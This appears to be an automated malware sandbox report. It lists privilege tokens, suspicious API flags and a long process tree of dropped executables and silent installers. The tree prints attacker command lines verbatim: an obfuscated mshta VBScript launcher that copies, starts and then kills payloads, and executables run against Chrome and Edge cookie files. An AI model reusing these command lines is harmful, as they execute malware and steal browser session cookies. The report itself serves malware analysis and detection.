| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4603920.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (3).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (3).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv 8PFJ7Xr/RkiQhw851r/usQ.0.2
C:\Users\Admin\Documents\Ph7SKqZGOIgshC61JNpbCxN5.exe
"C:\Users\Admin\Documents\Ph7SKqZGOIgshC61JNpbCxN5.exe"
C:\Users\Admin\Documents\9eAwJOPrFXjx72bkI5bRJ2WU.exe
"C:\Users\Admin\Documents\9eAwJOPrFXjx72bkI5bRJ2WU.exe"
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
"C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe"
C:\Users\Admin\Documents\KKr9W_cK7QZHQT49ljSOp7ep.exe
"C:\Users\Admin\Documents\KKr9W_cK7QZHQT49ljSOp7ep.exe"
C:\Users\Admin\Documents\dHTmi4R61qkMbVF29eS0KvSM.exe
"C:\Users\Admin\Documents\dHTmi4R61qkMbVF29eS0KvSM.exe"
C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe
"C:\Users\Admin\Documents\3tJDOLvW9JdZRHySiCJwFYGT.exe"
C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe
"C:\Users\Admin\Documents\K2aSBFrA_cHuoOf_8ZtXSMc_.exe"
C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe
"C:\Users\Admin\Documents\tagR_GHtIRsJS5siarvoMNbq.exe"
C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe
"C:\Users\Admin\Documents\vZSIKgTjqziPEz0JWLcpqXp4.exe"
C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe
"C:\Users\Admin\Documents\CKtgFsvgxGFhRN5JLRlsBLTG.exe"
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
"C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe"
C:\Users\Admin\Documents\lIkD5YTQEsXHxwXNGoW9X06y.exe
"C:\Users\Admin\Documents\lIkD5YTQEsXHxwXNGoW9X06y.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
"C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe"
C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe
"C:\Users\Admin\Documents\pRjxtUH4Y1sdrK20hogdP64C.exe"
C:\Users\Admin\Documents\SFy6g7Ex4EqD3t2BISAbhuWh.exe
"C:\Users\Admin\Documents\SFy6g7Ex4EqD3t2BISAbhuWh.exe"
C:\Users\Admin\Documents\nX1qQN8UEVNWIggeh_vV_Cmx.exe
"C:\Users\Admin\Documents\nX1qQN8UEVNWIggeh_vV_Cmx.exe"
C:\Users\Admin\Documents\Cb70gVclk30wGCXDIzC7MEwD.exe
"C:\Users\Admin\Documents\Cb70gVclk30wGCXDIzC7MEwD.exe"
C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe
"C:\Users\Admin\Documents\Ig_d14eGdwervmy7DFofIV9O.exe"
C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe
"C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe"
C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe
"C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe"
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
"C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe"
C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe
"C:\Users\Admin\Documents\epSY5JonORm5zUOCET_ffnPB.exe"
C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe
"C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"
C:\Users\Admin\Documents\hpnp_a0lhFfP7su9EKSuw_w9.exe
"C:\Users\Admin\Documents\hpnp_a0lhFfP7su9EKSuw_w9.exe"
C:\Users\Admin\Documents\Zz8mo11wpMCaGr79RLEk4vPq.exe
"C:\Users\Admin\Documents\Zz8mo11wpMCaGr79RLEk4vPq.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1944 -ip 1944
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\MqRxC7m72g9jwwE2lRN_IiU7.exe" ) do taskkill -f -iM "%~NxA"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1944 -s 316
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
C:\Users\Admin\Documents\Fe6dg4sTI4b3YuqL8xbjBfod.exe
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
C:\Users\Admin\Documents\XdSH7DWXqp6yaXqcW2MnJi9V.exe
C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe
"C:\Users\Admin\Documents\WTQvm11a9eyMEXiXLw7QhwZ0.exe" -q
C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe
"C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "MqRxC7m72g9jwwE2lRN_IiU7.exe"
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\Documents\DwFDoL5gj07oZ0kG90UFr1Mz.exe
C:\Users\Admin\AppData\Local\Temp\is-O15JS.tmp\pHDW1j1IeTZHDMBxJLx7Jz7d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O15JS.tmp\pHDW1j1IeTZHDMBxJLx7Jz7d.tmp" /SL5="$40204,138429,56832,C:\Users\Admin\Documents\pHDW1j1IeTZHDMBxJLx7Jz7d.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1632 -ip 1632
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2360 -ip 2360
C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe
"C:\Users\Admin\Documents\HqkHqVVv_6si5R2VVL2MfxxR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1064 -ip 1064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2188 -ip 2188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 1276 -ip 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 1556 -ip 1556
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2376 -ip 2376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 1100 -ip 1100
C:\Users\Admin\AppData\Roaming\7795918.exe
"C:\Users\Admin\AppData\Roaming\7795918.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 3828 -ip 3828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 288
C:\Users\Admin\AppData\Roaming\7159434.exe
"C:\Users\Admin\AppData\Roaming\7159434.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 296
C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe
"C:\Users\Admin\Documents\GNDvt5g3HxmYCmFACtCcclmN.exe"
C:\Users\Admin\AppData\Roaming\1532543.exe
"C:\Users\Admin\AppData\Roaming\1532543.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 1628
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Roaming\4603920.exe
"C:\Users\Admin\AppData\Roaming\4603920.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2160 -ip 2160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 280
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\is-0FLUP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-0FLUP.tmp\Setup.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-06FJV.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-06FJV.tmp\Inlog.tmp" /SL5="$50150,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-2V679.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2V679.tmp\WEATHER Manager.tmp" /SL5="$20348,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-F482G.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F482G.tmp\VPN.tmp" /SL5="$103A6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\is-V4CEU.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4CEU.tmp\MediaBurner2.tmp" /SL5="$10450,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4256 -ip 4256
C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-591GI.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 296
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Users\Admin\AppData\Roaming\2096115.exe
"C:\Users\Admin\AppData\Roaming\2096115.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 3988 -ip 3988
C:\Users\Admin\AppData\Roaming\2602399.exe
"C:\Users\Admin\AppData\Roaming\2602399.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4244 -ip 4244
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3988 -s 2320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4244 -ip 4244
C:\Users\Admin\AppData\Roaming\5280855.exe
"C:\Users\Admin\AppData\Roaming\5280855.exe"
C:\Users\Admin\AppData\Roaming\3859156.exe
"C:\Users\Admin\AppData\Roaming\3859156.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 808
C:\Users\Admin\AppData\Roaming\4303655.exe
"C:\Users\Admin\AppData\Roaming\4303655.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 840
C:\Users\Admin\AppData\Local\Temp\tmpAD77_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpAD77_tmp.exe"
C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe
"C:\Users\Admin\Documents\K8Hno9wMPq_SEtOmqzSO0cTe.exe"
C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe
"C:\Users\Admin\Documents\OuoC3LfzUwkBoMEu2wptPjMS.exe"
C:\Users\Admin\Documents\RCQ7i9ad5QYPzykbDX8g4fqB.exe
"C:\Users\Admin\Documents\RCQ7i9ad5QYPzykbDX8g4fqB.exe"
C:\Users\Admin\Documents\UJS3PWqIQvBq50W9vHzWcJsb.exe
"C:\Users\Admin\Documents\UJS3PWqIQvBq50W9vHzWcJsb.exe"
C:\Users\Admin\Documents\YpVI83jFyaU8LZDrcM65rd0z.exe
"C:\Users\Admin\Documents\YpVI83jFyaU8LZDrcM65rd0z.exe"
C:\Users\Admin\Documents\kK4gV8mj_l4TMZGAbeaA6KTG.exe
"C:\Users\Admin\Documents\kK4gV8mj_l4TMZGAbeaA6KTG.exe"
C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe
"C:\Users\Admin\Documents\DB_GbXPWmdYLlmz8y4_YoGg2.exe"
C:\Users\Admin\Documents\9pONIe0nFBxvnWt9ECWAXSgO.exe
"C:\Users\Admin\Documents\9pONIe0nFBxvnWt9ECWAXSgO.exe"
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
"C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe"
C:\Users\Admin\Documents\nQFFs_BuyKAqY1q118qmtfeB.exe
"C:\Users\Admin\Documents\nQFFs_BuyKAqY1q118qmtfeB.exe"
C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe
"C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe"
C:\Users\Admin\Documents\fmDyy112R03mFYSeyYsB9QHu.exe
"C:\Users\Admin\Documents\fmDyy112R03mFYSeyYsB9QHu.exe"
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
"C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe"
C:\Users\Admin\Documents\ofhPkhzCanPE3KTdiFKyJQNP.exe
"C:\Users\Admin\Documents\ofhPkhzCanPE3KTdiFKyJQNP.exe"
C:\Users\Admin\Documents\qv_FiRjt3InZdzKQeY3qPFTV.exe
"C:\Users\Admin\Documents\qv_FiRjt3InZdzKQeY3qPFTV.exe"
C:\Users\Admin\Documents\vz1K7aas2iNV_zAV8XypoGqZ.exe
"C:\Users\Admin\Documents\vz1K7aas2iNV_zAV8XypoGqZ.exe"
C:\Users\Admin\Documents\RCadZQI60Kq5Bjt5n_s2lFa9.exe
"C:\Users\Admin\Documents\RCadZQI60Kq5Bjt5n_s2lFa9.exe"
C:\Users\Admin\Documents\_6SO3RBEmYXEZvB1JyvN8RH4.exe
"C:\Users\Admin\Documents\_6SO3RBEmYXEZvB1JyvN8RH4.exe"
C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe
"C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe"
C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe
"C:\Users\Admin\Documents\Vu8JiHzoy_VQzkYrueDnKkdL.exe"
C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe
"C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"
C:\Users\Admin\Documents\pitI4UNAI_IFp4vEjEj3wL2U.exe
"C:\Users\Admin\Documents\pitI4UNAI_IFp4vEjEj3wL2U.exe"
C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe
"C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe"
C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JH53N.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe
"C:\Users\Admin\Documents\lzcc5otmRQiivUWGxRQNmSXt.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5824 -ip 5824
C:\Users\Admin\Documents\DjDwTp3p04hx12qdHlbuc4oA.exe
"C:\Users\Admin\Documents\DjDwTp3p04hx12qdHlbuc4oA.exe"
C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe
"C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\AppData\Local\Temp\is-9POT5.tmp\07cdwzaTf8d0t7OKE14p6WXx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9POT5.tmp\07cdwzaTf8d0t7OKE14p6WXx.tmp" /SL5="$10528,138429,56832,C:\Users\Admin\Documents\07cdwzaTf8d0t7OKE14p6WXx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 1808 -ip 1808
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3396 -ip 3396
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\b1x2wlTQfNKID4U1iI82grKw.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 260
C:\Users\Admin\AppData\Local\Temp\839.exe
C:\Users\Admin\AppData\Local\Temp\839.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 2436
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
C:\Users\Admin\Documents\0zUcjfwwaGb2J80laB3p5zqO.exe
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
C:\Users\Admin\Documents\KA37Kc2o57YExJFC6rcVJst6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5044 -ip 5044
C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe
"C:\Users\Admin\Documents\RRwfaxdJkHGtUbWpZJYN3aab.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6112 -ip 6112
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 4172 -ip 4172
C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe
"C:\Users\Admin\Documents\VysNse9aH2S6vEZG4VFDtDI3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5200 -ip 5200
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5148 -ip 5148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 6116 -ip 6116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6684 -ip 6684
C:\Users\Admin\AppData\Roaming\8408451.exe
"C:\Users\Admin\AppData\Roaming\8408451.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E124C864F913A45B40ED9CED7CCC8F8D C
C:\Users\Admin\AppData\Roaming\6541000.exe
"C:\Users\Admin\AppData\Roaming\6541000.exe"
C:\Users\Admin\AppData\Local\Temp\is-M8S8J.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-M8S8J.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\2213492.exe
"C:\Users\Admin\AppData\Roaming\2213492.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 2596 -ip 2596
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "b1x2wlTQfNKID4U1iI82grKw.exe"
C:\Users\Admin\Documents\c2GaMRbuGRYHSDZ2uleDbvjt.exe
